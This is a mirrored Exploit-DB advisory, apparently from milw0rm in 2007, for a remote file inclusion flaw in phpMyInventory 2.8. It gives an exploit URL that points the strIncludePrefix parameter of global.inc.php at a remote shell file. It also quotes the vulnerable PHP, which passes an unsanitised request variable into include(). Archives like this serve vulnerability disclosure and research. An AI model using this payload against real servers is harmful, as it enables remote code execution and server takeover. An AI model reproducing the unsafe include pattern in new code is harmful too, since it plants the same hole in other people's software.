bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4074.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

52 lines
No EOL
2 KiB
Text
Raw Blame History

########################################################################################
phpMyInventory (pmi)
v. 2.8
FOUND BY : o0xxdark0o
o0xxdark0o[at]msn.com
DOWNLOAD : http://sourceforge.net/projects/phpmyinventory/
REMOTE FILE ICLUDE
########################################################################################
FILE :
PATH\Includes\global.inc.php
########################################################################################
EXPLOIT:
www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt?
########################################################################################
thanks for all my friends.. str0ke ... oxdo .... cold z3ro...keenest
www.hach-teach.org - www.3asfh.com - www.goldenawy.com - www.yee7.com
########################################################################################
CODE:
<?
// where rare administrative emails will go
$adminEmail = "youraddress@yourdomain.com";
$secureAdmin = 0; # set to 1 if SSL is available
$sslPort = 443; # what port, if using SSL?
$rowLimit = 12; # how many records any given page should show at one time
# -------------------------------------------------------------------- #
session_register("userID");
session_register("sessionTime");
session_register("sessionSecurity");
// by creating a separate set of includes for different domain names,
// you can serve multiple PMI's from one codebase.
//
// if ($SERVER_NAME = "dev.3gwt.net") {
// $includeFolder = "Includes/3gwt";
// } else if ($SERVER_NAME = "www.foozball.com") {
// $includeFolder = "Includes/foozball";
// } else {
$includeFolder = "Includes";
// }
$strIncludePrefix = $strIncludePrefix.$includeFolder;
Include($strIncludePrefix."/db.inc.php");
-----there is more of the code download to see it in v. 2.8-----
########################################################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
# milw0rm.com [2007-06-16]
Reference in a new issue View git blame Copy permalink